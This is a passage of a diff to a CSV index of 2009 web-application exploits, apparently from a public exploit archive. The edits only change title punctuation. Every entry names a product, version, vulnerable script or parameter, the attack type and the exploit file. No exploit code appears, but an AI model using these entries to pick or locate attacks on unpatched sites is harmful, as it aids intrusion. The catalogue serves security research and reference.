Injection",2009-04-21,EgiX,php,webapps,0 8501,platforms/php/webapps/8501.txt,"CRE Loaded 6.2 - (products_id) SQL Injection",2009-04-21,Player,php,webapps,0 8502,platforms/php/webapps/8502.txt,"pastelcms 0.8.0 - Local File Inclusion / SQL Injection",2009-04-21,SirGod,php,webapps,0 8503,platforms/php/webapps/8503.txt,"TotalCalendar 2.4 - 'Include' Local File Inclusion",2009-04-21,SirGod,php,webapps,0 @@ -20951,17 +20954,17 @@ id,file,description,date,author,platform,type,port 8546,platforms/php/webapps/8546.txt,"Thickbox Gallery 2 - 'index.php' Local File Inclusion",2009-04-27,SirGod,php,webapps,0 8547,platforms/php/webapps/8547.txt,"EZ-Blog Beta2 - (category) SQL Injection",2009-04-27,YEnH4ckEr,php,webapps,0 8548,platforms/php/webapps/8548.txt,"ECShop 2.5.0 - (order_sn) SQL Injection",2009-04-27,Securitylab.ir,php,webapps,0 -8549,platforms/php/webapps/8549.txt,"Flatchat 3.0 - (pmscript.php with) Local File Inclusion",2009-04-27,SirGod,php,webapps,0 +8549,platforms/php/webapps/8549.txt,"Flatchat 3.0 - 'pmscript.php with' Local File Inclusion",2009-04-27,SirGod,php,webapps,0 8550,platforms/php/webapps/8550.txt,"Teraway LinkTracker 1.0 - Insecure Cookie Handling",2009-04-27,"ThE g0bL!N",php,webapps,0 8551,platforms/php/webapps/8551.txt,"Teraway FileStream 1.0 - Insecure Cookie Handling",2009-04-27,"ThE g0bL!N",php,webapps,0 8552,platforms/php/webapps/8552.txt,"Teraway LiveHelp 2.0 - Insecure Cookie Handling",2009-04-27,"ThE g0bL!N",php,webapps,0 8553,platforms/php/webapps/8553.htm,"Teraway LinkTracker 1.0 - Remote Password Change Exploit",2009-04-27,"ThE g0bL!N",php,webapps,0 8555,platforms/php/webapps/8555.txt,"ABC Advertise 1.0 - Admin Password Disclosure",2009-04-27,SirGod,php,webapps,0 -8557,platforms/php/webapps/8557.htm,"VisionLms 1.0 - (changePW.php) Remote Password Change Exploit",2009-04-28,Mr.tro0oqy,php,webapps,0 +8557,platforms/php/webapps/8557.htm,"VisionLms 1.0 - 'changePW.php' Remote Password Change Exploit",2009-04-28,Mr.tro0oqy,php,webapps,0 8558,platforms/php/webapps/8558.txt,"MIM: InfiniX 1.2.003 - Multiple SQL Injections",2009-04-28,YEnH4ckEr,php,webapps,0 8559,platforms/php/webapps/8559.c,"webSPELL 4.2.0d (Linux) - Local File Disclosure (C)",2009-04-28,StAkeR,php,webapps,0 -8563,platforms/php/webapps/8563.txt,"eLitius 1.0 - (banner-details.php id) SQL Injection",2009-04-29,snakespc,php,webapps,0 -8565,platforms/php/webapps/8565.txt,"ProjectCMS 1.0b - (index.php sn) SQL Injection",2009-04-29,YEnH4ckEr,php,webapps,0 +8563,platforms/php/webapps/8563.txt,"eLitius 1.0 - 'banner-details.php id' SQL Injection",2009-04-29,snakespc,php,webapps,0 +8565,platforms/php/webapps/8565.txt,"ProjectCMS 1.0b - 'index.php sn' SQL Injection",2009-04-29,YEnH4ckEr,php,webapps,0 8566,platforms/php/webapps/8566.txt,"S-CMS 1.1 Stable - (page) Local File Inclusion",2009-04-29,ZoRLu,php,webapps,0 8567,platforms/php/webapps/8567.txt,"Zubrag Smart File Download 1.3 - Arbitrary File Download",2009-04-29,Aodrulez,php,webapps,0 8571,platforms/php/webapps/8571.txt,"Tiger Dms - Authentication Bypass",2009-04-29,"ThE g0bL!N",php,webapps,0 @@ -20970,7 +20973,7 @@ id,file,description,date,author,platform,type,port 8585,platforms/php/webapps/8585.txt,"Golabi CMS 1.0.1 - Session Poisoning",2009-05-01,CrazyAngel,php,webapps,0 8586,platforms/php/webapps/8586.txt,"MiniTwitter 0.2b - Multiple SQL Injections",2009-05-01,YEnH4ckEr,php,webapps,0 8587,platforms/php/webapps/8587.htm,"MiniTwitter 0.2b - Remote User Options Changer Exploit",2009-05-01,YEnH4ckEr,php,webapps,0 -8593,platforms/php/webapps/8593.txt,"pecio CMS 1.1.5 - (index.php language) Local File Inclusion",2009-05-01,SirGod,php,webapps,0 +8593,platforms/php/webapps/8593.txt,"pecio CMS 1.1.5 - 'index.php language' Local File Inclusion",2009-05-01,SirGod,php,webapps,0 8596,platforms/asp/webapps/8596.pl,"Winn ASP Guestbook 1.01b - Remote Database Disclosure",2009-05-04,ZoRLu,asp,webapps,0 8599,platforms/php/webapps/8599.txt,"AGTC MyShop 3.2 - Insecure Cookie Handling",2009-05-04,Mr.tro0oqy,php,webapps,0 8600,platforms/php/webapps/8600.txt,"BluSky CMS - (news_id) SQL Injection",2009-05-04,snakespc,php,webapps,0 @@ -20979,7 +20982,7 @@ id,file,description,date,author,platform,type,port 8604,platforms/php/webapps/8604.txt,"PHP Site Lock 2.0 - Insecure Cookie Handling",2009-05-04,"ThE g0bL!N",php,webapps,0 8605,platforms/php/webapps/8605.txt,"Million Dollar Text Links 1.0 - Arbitrary Authentication Bypass",2009-05-04,"ThE g0bL!N",php,webapps,0 8608,platforms/php/webapps/8608.txt,"projectCMS 1.1b - Multiple Vulnerabilities",2009-05-04,YEnH4ckEr,php,webapps,0 -8609,platforms/php/webapps/8609.pl,"Uguestbook 1.0b - (Guestbook.mdb) Arbitrary Database Disclosure",2009-05-04,Cyber-Zone,php,webapps,0 +8609,platforms/php/webapps/8609.pl,"Uguestbook 1.0b - 'Guestbook.mdb' Arbitrary Database Disclosure",2009-05-04,Cyber-Zone,php,webapps,0 8610,platforms/asp/webapps/8610.pl,"Ublog access version - Arbitrary Database Disclosure",2009-05-04,Cyber-Zone,asp,webapps,0 8615,platforms/php/webapps/8615.txt,"TemaTres 1.0.3 - Authentication Bypass / SQL Injection / Cross-Site Scripting",2009-05-05,YEnH4ckEr,php,webapps,0 8616,platforms/php/webapps/8616.pl,"TemaTres 1.0.3 - Blind SQL Injection",2009-05-05,YEnH4ckEr,php,webapps,0 @@ -21013,7 +21016,7 @@ id,file,description,date,author,platform,type,port 8675,platforms/php/webapps/8675.txt,"Ascad Networks 5 - Products Insecure Cookie Handling",2009-05-14,G4N0K,php,webapps,0 8676,platforms/php/webapps/8676.txt,"My Game Script 2.0 - Authentication Bypass",2009-05-14,"ThE g0bL!N",php,webapps,0 8679,platforms/php/webapps/8679.txt,"Shutter 0.1.1 - Multiple SQL Injections",2009-05-14,YEnH4ckEr,php,webapps,0 -8680,platforms/php/webapps/8680.txt,"beLive 0.2.3 - (arch.php arch) Local File Inclusion",2009-05-14,Kacper,php,webapps,0 +8680,platforms/php/webapps/8680.txt,"beLive 0.2.3 - 'arch.php arch' Local File Inclusion",2009-05-14,Kacper,php,webapps,0 8681,platforms/php/webapps/8681.php,"StrawBerry 1.1.1 - Local File Inclusion / Remote Command Execution",2009-05-14,[AVT],php,webapps,0 8682,platforms/php/webapps/8682.txt,"MRCGIGUY ClickBank Directory 1.0.1 - Insecure Cookie Handling",2009-05-14,TiGeR-Dz,php,webapps,0 8683,platforms/php/webapps/8683.txt,"Submitter Script - Authentication Bypass",2009-05-14,"ThE g0bL!N",php,webapps,0 @@ -21032,7 +21035,7 @@ id,file,description,date,author,platform,type,port 8700,platforms/php/webapps/8700.txt,"Rama CMS 0.9.8 - 'download.php' File Disclosure",2009-05-15,Br0ly,php,webapps,0 8702,platforms/php/webapps/8702.txt,"2DayBiz Custom T-shirt Design - (SQL Injection / Cross-Site Scripting) Multiple Remote Vulnerabilities",2009-05-15,snakespc,php,webapps,0 8705,platforms/asp/webapps/8705.txt,"DMXReady Registration Manager 1.1 - Database Disclosure",2009-05-15,S4S-T3rr0r!sT,asp,webapps,0 -8706,platforms/php/webapps/8706.pl,"PHPenpals 1.1 - (mail.php ID) SQL Injection",2009-05-15,Br0ly,php,webapps,0 +8706,platforms/php/webapps/8706.pl,"PHPenpals 1.1 - 'mail.php ID' SQL Injection",2009-05-15,Br0ly,php,webapps,0 8707,platforms/php/webapps/8707.txt,"my-colex 1.4.2 - Authentication Bypass / Cross-Site Scripting / SQL Injection",2009-05-15,YEnH4ckEr,php,webapps,0 8708,platforms/php/webapps/8708.txt,"my-gesuad 0.9.14 - Authentication Bypass / SQL Injection / Cross-Site Scripting",2009-05-15,YEnH4ckEr,php,webapps,0 8709,platforms/php/webapps/8709.txt,"Pc4Uploader 9.0 - Blind SQL Injection",2009-05-18,Qabandi,php,webapps,0 @@ -21046,7 +21049,7 @@ id,file,description,date,author,platform,type,port 8719,platforms/asp/webapps/8719.py,"Dana Portal - Remote Change Admin Password",2009-05-18,Abysssec,asp,webapps,0 8724,platforms/php/webapps/8724.txt,"LightOpenCMS 0.1 - 'id' SQL Injection",2009-05-18,Mi4night,php,webapps,0 8725,platforms/php/webapps/8725.php,"Jieqi CMS 1.5 - Remote Code Execution",2009-05-18,Securitylab.ir,php,webapps,0 -8726,platforms/asp/webapps/8726.txt,"MaxCMS 2.0 - (inc/ajax.asp) SQL Injection",2009-05-18,Securitylab.ir,asp,webapps,0 +8726,platforms/asp/webapps/8726.txt,"MaxCMS 2.0 - 'inc/ajax.asp' SQL Injection",2009-05-18,Securitylab.ir,asp,webapps,0 8727,platforms/php/webapps/8727.txt,"DGNews 3.0 Beta - 'id' SQL Injection",2009-05-18,Cyber-Zone,php,webapps,0 8728,platforms/php/webapps/8728.htm,"PHP Article Publisher - Remote Change Admin Password",2009-05-18,ahmadbady,php,webapps,0 8730,platforms/php/webapps/8730.txt,"VidShare Pro - Arbitrary File Upload",2009-05-19,InjEctOr5,php,webapps,0 @@ -21064,7 +21067,7 @@ id,file,description,date,author,platform,type,port 8745,platforms/php/webapps/8745.txt,"Catviz 0.4.0 beta1 - Local File Inclusion / Cross-Site Scripting",2009-05-20,ByALBAYX,php,webapps,0 8746,platforms/php/webapps/8746.txt,"NC GBook 1.0 - Remote Command Injection",2009-05-20,"ThE g0bL!N",php,webapps,0 8747,platforms/php/webapps/8747.txt,"NC LinkList 1.3.1 - Remote Command Injection",2009-05-20,"ThE g0bL!N",php,webapps,0 -8748,platforms/php/webapps/8748.txt,"Realty Web-Base 1.0 - (list_list.php id) SQL Injection",2009-05-20,"ThE g0bL!N",php,webapps,0 +8748,platforms/php/webapps/8748.txt,"Realty Web-Base 1.0 - 'list_list.php id' SQL Injection",2009-05-20,"ThE g0bL!N",php,webapps,0 8749,platforms/asp/webapps/8749.txt,"DMXReady Registration Manager 1.1 - Arbitrary File Upload",2009-05-20,Securitylab.ir,asp,webapps,0 8750,platforms/php/webapps/8750.txt,"PHP Article Publisher - Arbitrary Authentication Bypass",2009-05-20,"ThE g0bL!N",php,webapps,0 8751,platforms/php/webapps/8751.txt,"bSpeak 1.10 - (forumid) Blind SQL Injection",2009-05-20,snakespc,php,webapps,0 @@ -21086,7 +21089,7 @@ id,file,description,date,author,platform,type,port 8778,platforms/php/webapps/8778.txt,"minitwitter 0.3-beta - SQL Injection / Cross-Site Scripting",2009-05-26,YEnH4ckEr,php,webapps,0 8779,platforms/php/webapps/8779.txt,"Joomla! Component Boy Scout Advancement 0.3 - 'id' SQL Injection",2009-05-26,YEnH4ckEr,php,webapps,0 8781,platforms/php/webapps/8781.txt,"Dokuwiki 2009-02-14 - Local File Inclusion",2009-05-26,girex,php,webapps,0 -8784,platforms/php/webapps/8784.txt,"vBulletin vbBux/vbPlaza 2.x - (vbplaza.php) Blind SQL Injection",2009-05-26,"Cold Zero",php,webapps,0 +8784,platforms/php/webapps/8784.txt,"vBulletin vbBux/vbPlaza 2.x - 'vbplaza.php' Blind SQL Injection",2009-05-26,"Cold Zero",php,webapps,0 8785,platforms/asp/webapps/8785.txt,"Cute Editor ASP.NET - Remote File Disclosure",2009-05-26,Securitylab.ir,asp,webapps,0 8787,platforms/php/webapps/8787.txt,"MyFirstCMS 1.0.2 - Arbitrary File Delete",2009-05-26,darkjoker,php,webapps,0 8788,platforms/php/webapps/8788.txt,"Mole Adult Portal Script - 'profile.php user_id' SQL Injection",2009-05-26,Qabandi,php,webapps,0 @@ -21101,7 +21104,7 @@ id,file,description,date,author,platform,type,port 8802,platforms/php/webapps/8802.txt,"Kensei Board 2.0.0b - Multiple SQL Injections",2009-05-26,cOndemned,php,webapps,0 8803,platforms/php/webapps/8803.txt,"MyForum 1.3 - Authentication Bypass",2009-05-26,"ThE g0bL!N",php,webapps,0 8805,platforms/php/webapps/8805.txt,"Flash Image Gallery 1.1 - Arbitrary Config File Disclosure",2009-05-26,DarkbiteX,php,webapps,0 -8807,platforms/php/webapps/8807.htm,"ShaadiClone 2.0 - (addAdminmembercode.php) Add Admin",2009-05-26,x.CJP.x,php,webapps,0 +8807,platforms/php/webapps/8807.htm,"ShaadiClone 2.0 - 'addAdminmembercode.php' Add Admin",2009-05-26,x.CJP.x,php,webapps,0 8808,platforms/php/webapps/8808.txt,"phpBugTracker 1.0.3 - Authentication Bypass",2009-05-26,ByALBAYX,php,webapps,0 8809,platforms/php/webapps/8809.htm,"ZeeCareers 2.0 - 'addAdminmembercode.php' Add Admin",2009-05-26,x.CJP.x,php,webapps,0 8810,platforms/php/webapps/8810.txt,"WebMember 1.0 - (formID) SQL Injection",2009-05-26,KIM,php,webapps,0 @@ -21132,7 +21135,7 @@ id,file,description,date,author,platform,type,port 8843,platforms/php/webapps/8843.pl,"Online Grades & Attendance 3.2.6 - Credentials Changer SQL Exploit",2009-06-01,YEnH4ckEr,php,webapps,0 8844,platforms/php/webapps/8844.txt,"Online Grades & Attendance 3.2.6 - Multiple SQL Injections",2009-06-01,YEnH4ckEr,php,webapps,0 8847,platforms/php/webapps/8847.txt,"Joomla! Component Joomlaequipment (com_juser) 2.0.4 - SQL Injection",2009-06-01,"Chip d3 bi0s",php,webapps,0 -8848,platforms/php/webapps/8848.txt,"ecsportal rel 6.5 - (article_view_photo.php id) SQL Injection",2009-06-01,taRentReXx,php,webapps,0 +8848,platforms/php/webapps/8848.txt,"ecsportal rel 6.5 - 'article_view_photo.php id' SQL Injection",2009-06-01,taRentReXx,php,webapps,0 8849,platforms/asp/webapps/8849.txt,"R2 NewsLetter Lite/Pro/Stats - 'admin.mdb' Database Disclosure",2009-06-01,TiGeR-Dz,asp,webapps,0 8850,platforms/php/webapps/8850.txt,"PAD Site Scripts 3.6 - Arbitrary Database Backup",2009-06-01,TiGeR-Dz,php,webapps,0 8851,platforms/php/webapps/8851.txt,"AdaptBB 1.0 - 'forumspath' Remote File Inclusion",2009-06-01,"Mehmet Ince",php,webapps,0 @@ -21150,9 +21153,9 @@ id,file,description,date,author,platform,type,port 8866,platforms/php/webapps/8866.php,"Podcast Generator 1.2 - Unauthorized Re-Installation Remote Exploit",2009-06-03,StAkeR,php,webapps,0 8867,platforms/php/webapps/8867.pl,"Joomla! Component Seminar 1.28 - 'id' Blind SQL Injection",2009-06-03,"ThE g0bL!N",php,webapps,0 8868,platforms/php/webapps/8868.txt,"OCS Inventory NG 1.02 - Remote File Disclosure",2009-06-03,"Nico Leidecker",php,webapps,0 -8869,platforms/php/webapps/8869.txt,"Supernews 2.6 - (index.php noticia) SQL Injection",2009-06-03,DD3str0y3r,php,webapps,0 +8869,platforms/php/webapps/8869.txt,"Supernews 2.6 - 'index.php noticia' SQL Injection",2009-06-03,DD3str0y3r,php,webapps,0 8870,platforms/php/webapps/8870.txt,"Joomla! Component Omilen Photo Gallery 0.5b - Local File Inclusion",2009-06-03,ByALBAYX,php,webapps,0 -8871,platforms/php/webapps/8871.txt,"Movie PHP Script 2.0 - (init.php anticode) Code Execution",2009-06-03,SirGod,php,webapps,0 +8871,platforms/php/webapps/8871.txt,"Movie PHP Script 2.0 - 'init.php anticode' Code Execution",2009-06-03,SirGod,php,webapps,0 8872,platforms/php/webapps/8872.txt,"Joomla! Component com_mosres - Multiple SQL Injections",2009-06-03,"Chip d3 bi0s",php,webapps,0 8874,platforms/php/webapps/8874.txt,"SuperCali PHP Event Calendar - Arbitrary Change Admin Password",2009-06-04,TiGeR-Dz,php,webapps,0 8876,platforms/php/webapps/8876.htm,"Web Directory PRO - 'Admins.php' Change Admin Password",2009-06-04,TiGeR-Dz,php,webapps,0 @@ -21164,7 +21167,7 @@ id,file,description,date,author,platform,type,port 8884,platforms/php/webapps/8884.txt,"Kjtechforce mailman b1 - (code) SQL Injection Delete Row",2009-06-05,YEnH4ckEr,php,webapps,0 8885,platforms/php/webapps/8885.pl,"Kjtechforce mailman b1 - (dest) Blind SQL Injection",2009-06-05,YEnH4ckEr,php,webapps,0 8886,platforms/php/webapps/8886.txt,"MyCars Automotive - Authentication Bypass",2009-06-08,snakespc,php,webapps,0 -8889,platforms/asp/webapps/8889.txt,"VT-Auth 1.0 - (zHk8dEes3.txt) File Disclosure",2009-06-08,ByALBAYX,asp,webapps,0 +8889,platforms/asp/webapps/8889.txt,"VT-Auth 1.0 - 'zHk8dEes3.txt' File Disclosure",2009-06-08,ByALBAYX,asp,webapps,0 8890,platforms/asp/webapps/8890.txt,"FipsCMS Light 2.1 - 'db.mdb' Remote Database Disclosure",2009-06-08,ByALBAYX,asp,webapps,0 8891,platforms/php/webapps/8891.txt,"Joomla! Component com_school 1.4 - (classid) SQL Injection",2009-06-08,"Chip d3 bi0s",php,webapps,0 8892,platforms/php/webapps/8892.txt,"Virtue Classifieds - (category) SQL Injection",2009-06-08,OzX,php,webapps,0 @@ -21195,7 +21198,7 @@ id,file,description,date,author,platform,type,port 8925,platforms/php/webapps/8925.txt,"Desi Short URL Script - (Authentication Bypass) Insecure Cookie Handling",2009-06-10,N@bilX,php,webapps,0 8926,platforms/php/webapps/8926.txt,"mrcgiguy freeticket - Cookie Handling / SQL Injection",2009-06-10,"ThE g0bL!N",php,webapps,0 8927,platforms/php/webapps/8927.pl,"Open Biller 0.1 - 'Username' Blind SQL Injection",2009-06-10,YEnH4ckEr,php,webapps,0 -8928,platforms/php/webapps/8928.txt,"PHPWebThings 1.5.2 - (help.php module) Local File Inclusion",2009-06-11,Br0ly,php,webapps,0 +8928,platforms/php/webapps/8928.txt,"PHPWebThings 1.5.2 - 'help.php module' Local File Inclusion",2009-06-11,Br0ly,php,webapps,0 8929,platforms/php/webapps/8929.txt,"Splog 1.2 Beta - Multiple SQL Injections",2009-06-11,YEnH4ckEr,php,webapps,0 8931,platforms/php/webapps/8931.txt,"TorrentVolve 1.4 - (deleteTorrent) Delete Arbitrary File",2009-06-11,Br0ly,php,webapps,0 8932,platforms/php/webapps/8932.txt,"yogurt 0.3 - Cross-Site Scripting / SQL Injection",2009-06-11,Br0ly,php,webapps,0 @@ -21214,20 +21217,20 @@ id,file,description,date,author,platform,type,port 8949,platforms/php/webapps/8949.txt,"SugarCRM 5.2.0e - Remote Code Execution",2009-06-15,USH,php,webapps,0 8950,platforms/php/webapps/8950.txt,"formmail 1.92 - Multiple Vulnerabilities",2009-06-15,USH,php,webapps,0 8951,platforms/php/webapps/8951.php,"DB Top Sites 1.0 - Remote Command Execution",2009-06-15,SirGod,php,webapps,0 -8952,platforms/php/webapps/8952.txt,"DB Top Sites 1.0 - (index.php u) Local File Inclusion",2009-06-15,SirGod,php,webapps,0 +8952,platforms/php/webapps/8952.txt,"DB Top Sites 1.0 - 'index.php u' Local File Inclusion",2009-06-15,SirGod,php,webapps,0 8953,platforms/php/webapps/8953.txt,"elvin bts 1.2.0 - Multiple Vulnerabilities",2009-06-15,SirGod,php,webapps,0 8954,platforms/php/webapps/8954.txt,"adaptweb 0.9.2 - Local File Inclusion / SQL Injection",2009-06-15,SirGod,php,webapps,0 8956,platforms/php/webapps/8956.htm,"Evernew Free Joke Script 1.2 - Remote Change Password Exploit",2009-06-15,Hakxer,php,webapps,0 8958,platforms/php/webapps/8958.txt,"TorrentTrader Classic 1.09 - Multiple Vulnerabilities",2009-06-15,waraxe,php,webapps,0 8959,platforms/php/webapps/8959.pl,"Joomla! Component com_iJoomla_rss - Blind SQL Injection",2009-06-15,"Mehmet Ince",php,webapps,0 8961,platforms/php/webapps/8961.txt,"WordPress Plugin Photoracer 1.0 - 'id' SQL Injection",2009-06-15,Kacper,php,webapps,0 -8962,platforms/php/webapps/8962.txt,"PHPCollegeExchange 0.1.5c - (listing_view.php itemnr) SQL Injection",2009-06-15,SirGod,php,webapps,0 +8962,platforms/php/webapps/8962.txt,"PHPCollegeExchange 0.1.5c - 'listing_view.php itemnr' SQL Injection",2009-06-15,SirGod,php,webapps,0 8965,platforms/php/webapps/8965.txt,"vBulletin Radio and TV Player AddOn - HTML Injection",2009-06-15,d3v1l,php,webapps,0 8966,platforms/php/webapps/8966.txt,"PHPortal 1 - 'topicler.php id' SQL Injection",2009-06-15,"Mehmet Ince",php,webapps,0 8967,platforms/php/webapps/8967.txt,"The Recipe Script 5 - Cross-Site Scripting",2009-06-15,"ThE g0bL!N",php,webapps,0 8968,platforms/php/webapps/8968.txt,"Joomla! Component com_jumi - (fileid) Blind SQL Injection",2009-06-15,"Chip d3 bi0s",php,webapps,0 -8974,platforms/php/webapps/8974.txt,"XOOPS 2.3.3 - (.htaccess) Remote File Disclosure",2009-06-16,daath,php,webapps,0 -8975,platforms/php/webapps/8975.txt,"PHPFK 7.03 - (page_bottom.php) Local File Inclusion",2009-06-17,ahmadbady,php,webapps,0 +8974,platforms/php/webapps/8974.txt,"XOOPS 2.3.3 - '.htaccess' Remote File Disclosure",2009-06-16,daath,php,webapps,0 +8975,platforms/php/webapps/8975.txt,"PHPFK 7.03 - 'page_bottom.php' Local File Inclusion",2009-06-17,ahmadbady,php,webapps,0 8977,platforms/php/webapps/8977.txt,"TekBase All-in-One 3.1 - Multiple SQL Injections",2009-06-17,n3wb0ss,php,webapps,0 8978,platforms/php/webapps/8978.txt,"Fuzzylime CMS 3.03a - Local Inclusion / Arbitrary File Corruption (PoC)",2009-06-17,StAkeR,php,webapps,0 8979,platforms/php/webapps/8979.txt,"FretsWeb 1.2 - Multiple Local File Inclusion",2009-06-17,YEnH4ckEr,php,webapps,0 @@ -21251,11 +21254,11 @@ id,file,description,date,author,platform,type,port 9005,platforms/php/webapps/9005.py,"Zen Cart 1.3.8 - SQL Execution Exploit",2009-06-23,BlackH,php,webapps,0 9008,platforms/php/webapps/9008.txt,"phpCollegeExchange 0.1.5c - Remote File Inclusion / Local File Inclusion / Cross-Site Scripting",2009-06-23,CraCkEr,php,webapps,0 9009,platforms/php/webapps/9009.txt,"BASE 1.2.4 - (Authentication Bypass) Insecure Cookie Handling",2009-06-24,"Tim Medin",php,webapps,0 -9010,platforms/php/webapps/9010.txt,"Glossword 1.8.11 - (index.php x) Local File Inclusion",2009-06-24,t0fx,php,webapps,0 +9010,platforms/php/webapps/9010.txt,"Glossword 1.8.11 - 'index.php x' Local File Inclusion",2009-06-24,t0fx,php,webapps,0 9011,platforms/php/webapps/9011.txt,"Joomla! Component com_pinboard - Arbitrary File Upload",2009-06-24,ViRuSMaN,php,webapps,0 9012,platforms/php/webapps/9012.txt,"Tribiq CMS 5.0.12c - Cross-Site Scripting / Local File Inclusion",2009-06-24,CraCkEr,php,webapps,0 9014,platforms/php/webapps/9014.txt,"PHPEcho CMS 2.0-rc3 - (forum) Cross-Site Scripting Cookie Stealing / Blind",2009-06-24,JosS,php,webapps,0 -9015,platforms/php/webapps/9015.txt,"LightOpenCMS 0.1 - (smarty.php cwd) Local File Inclusion",2009-06-24,JosS,php,webapps,0 +9015,platforms/php/webapps/9015.txt,"LightOpenCMS 0.1 - 'smarty.php cwd' Local File Inclusion",2009-06-24,JosS,php,webapps,0 9016,platforms/php/webapps/9016.txt,"Joomla! Component com_amocourse - 'catid' SQL Injection",2009-06-24,"Chip d3 bi0s",php,webapps,0 9017,platforms/php/webapps/9017.txt,"Joomla! Component com_pinboard - (task) SQL Injection",2009-06-25,Stack,php,webapps,0 9018,platforms/php/webapps/9018.txt,"MyFusion 6b - settings[locale] Local File Inclusion",2009-06-25,CraCkEr,php,webapps,0 @@ -21267,12 +21270,12 @@ id,file,description,date,author,platform,type,port 9024,platforms/php/webapps/9024.txt,"ForumPal FE 1.1 - Authentication Bypass",2009-06-26,"ThE g0bL!N",php,webapps,0 9025,platforms/php/webapps/9025.txt,"Mega File Manager 1.0 - 'index.php' Local File Inclusion",2009-06-26,SirGod,php,webapps,0 9026,platforms/php/webapps/9026.txt,"WHOISCART - (Authentication Bypass) Information Disclosure",2009-06-29,SecurityRules,php,webapps,0 -9027,platforms/php/webapps/9027.txt,"Messages Library 2.0 - (cat.php CatID) SQL Injection",2009-06-29,SecurityRules,php,webapps,0 +9027,platforms/php/webapps/9027.txt,"Messages Library 2.0 - 'cat.php CatID' SQL Injection",2009-06-29,SecurityRules,php,webapps,0 9028,platforms/php/webapps/9028.txt,"Joomla! Component com_php - 'id' Blind SQL Injection",2009-06-29,"Chip d3 bi0s",php,webapps,0 9030,platforms/php/webapps/9030.txt,"Joomla! Component com_K2 -q 1.0.1b - (category) SQL Injection",2009-06-29,"Chip d3 bi0s",php,webapps,0 9032,platforms/php/webapps/9032.txt,"osTicket 1.6 RC4 - Admin Login Blind SQL Injection",2009-06-29,"Adam Baldwin",php,webapps,0 9035,platforms/php/webapps/9035.txt,"Almnzm - (COOKIE: customer) SQL Injection",2009-06-29,Qabandi,php,webapps,0 -9036,platforms/php/webapps/9036.txt,"PHP-Sugar 0.80 - (index.php t) Local File Inclusion",2009-06-29,ahmadbady,php,webapps,0 +9036,platforms/php/webapps/9036.txt,"PHP-Sugar 0.80 - 'index.php t' Local File Inclusion",2009-06-29,ahmadbady,php,webapps,0 9037,platforms/php/webapps/9037.txt,"Clicknet CMS 2.1 - (side) Arbitrary File Disclosure",2009-06-29,"ThE g0bL!N",php,webapps,0 9040,platforms/php/webapps/9040.txt,"Joomla! Component com_bookflip - (book_id) SQL Injection",2009-06-29,boom3rang,php,webapps,0 9041,platforms/php/webapps/9041.txt,"Audio Article Directory - (file) Remote File Disclosure",2009-06-29,"ThE g0bL!N",php,webapps,0 @@ -21312,11 +21315,11 @@ id,file,description,date,author,platform,type,port 9094,platforms/php/webapps/9094.txt,"EasyVillaRentalSite - 'id' SQL Injection",2009-07-09,BazOka-HaCkEr,php,webapps,0 9095,platforms/php/webapps/9095.txt,"TalkBack 2.3.14 - Multiple Vulnerabilities",2009-07-09,JIKO,php,webapps,0 9098,platforms/php/webapps/9098.txt,"Siteframe CMS 3.2.x - SQL Injection / phpinfo()",2009-07-09,NoGe,php,webapps,0 -9099,platforms/php/webapps/9099.pl,"Universe CMS 1.0.6 - (vnews.php id) SQL Injection",2009-07-09,Mr.tro0oqy,php,webapps,0 +9099,platforms/php/webapps/9099.pl,"Universe CMS 1.0.6 - 'vnews.php id' SQL Injection",2009-07-09,Mr.tro0oqy,php,webapps,0 9101,platforms/php/webapps/9101.txt,"phpbms 0.96 - Multiple Vulnerabilities",2009-07-10,eLwaux,php,webapps,0 9103,platforms/php/webapps/9103.txt,"gencms 2006 - Multiple Vulnerabilities",2009-07-10,eLwaux,php,webapps,0 9105,platforms/php/webapps/9105.txt,"MyMsg 1.0.3 - 'uid' SQL Injection",2009-07-10,Monster-Dz,php,webapps,0 -9107,platforms/php/webapps/9107.txt,"Phenotype CMS 2.8 - (login.php user) Blind SQL Injection",2009-07-10,"Khashayar Fereidani",php,webapps,0 +9107,platforms/php/webapps/9107.txt,"Phenotype CMS 2.8 - 'login.php user' Blind SQL Injection",2009-07-10,"Khashayar Fereidani",php,webapps,0 9109,platforms/php/webapps/9109.txt,"ToyLog 0.1 - SQL Injection / Remote Code Execution",2009-07-10,darkjoker,php,webapps,0 9110,platforms/php/webapps/9110.txt,"WordPress Core & Plugins - Privileges Unchecked in admin.php / Multiple Information",2009-07-10,"Core Security",php,webapps,0 9111,platforms/php/webapps/9111.txt,"Jobbr 2.2.7 - Multiple SQL Injections",2009-07-10,Moudi,php,webapps,0 @@ -21345,10 +21348,10 @@ id,file,description,date,author,platform,type,port 9159,platforms/php/webapps/9159.php,"Infinity 2.0.5 - Arbitrary Create Admin Exploit",2009-07-15,Qabandi,php,webapps,0 9161,platforms/php/webapps/9161.txt,"Admin News Tools - Remote Contents Change",2009-07-15,Securitylab.ir,php,webapps,0 9162,platforms/php/webapps/9162.txt,"WebLeague 2.2.0 - 'profile.php' SQL Injection",2009-07-15,Arka69,php,webapps,0 -9164,platforms/php/webapps/9164.txt,"webLeague 2.2.0 - (install.php) Remote Change Password Exploit",2009-07-16,TiGeR-Dz,php,webapps,0 +9164,platforms/php/webapps/9164.txt,"webLeague 2.2.0 - 'install.php' Remote Change Password Exploit",2009-07-16,TiGeR-Dz,php,webapps,0 9165,platforms/php/webapps/9165.pl,"webLeague 2.2.0 - Authentication Bypass",2009-07-16,ka0x,php,webapps,0 9166,platforms/php/webapps/9166.txt,"ZenPhoto Gallery 1.2.5 - Admin Password Reset (CRSF)",2009-07-16,petros,php,webapps,0 -9171,platforms/php/webapps/9171.txt,"VS PANEL 7.5.5 - (results.php Cat_ID) SQL Injection",2009-07-16,C0D3R-Dz,php,webapps,0 +9171,platforms/php/webapps/9171.txt,"VS PANEL 7.5.5 - 'results.php Cat_ID' SQL Injection",2009-07-16,C0D3R-Dz,php,webapps,0 9174,platforms/php/webapps/9174.txt,"PHP Live! 3.2.1/2 - 'x' Parameter Blind SQL Injection",2009-07-16,boom3rang,php,webapps,0 9176,platforms/php/webapps/9176.txt,"dB Masters MultiMedia's Content Manager 4.5 - SQL Injection",2009-07-16,NoGe,php,webapps,0 9179,platforms/php/webapps/9179.txt,"Super Simple Blog Script 2.5.4 - Local File Inclusion",2009-07-17,JIKO,php,webapps,0 @@ -21358,11 +21361,11 @@ id,file,description,date,author,platform,type,port 9184,platforms/php/webapps/9184.txt,"Ger Versluis 2000 5.5 24 - SITE_fiche.php SQL Injection",2009-07-17,DeCo017,php,webapps,0 9185,platforms/php/webapps/9185.txt,"good/bad vote - Cross-Site 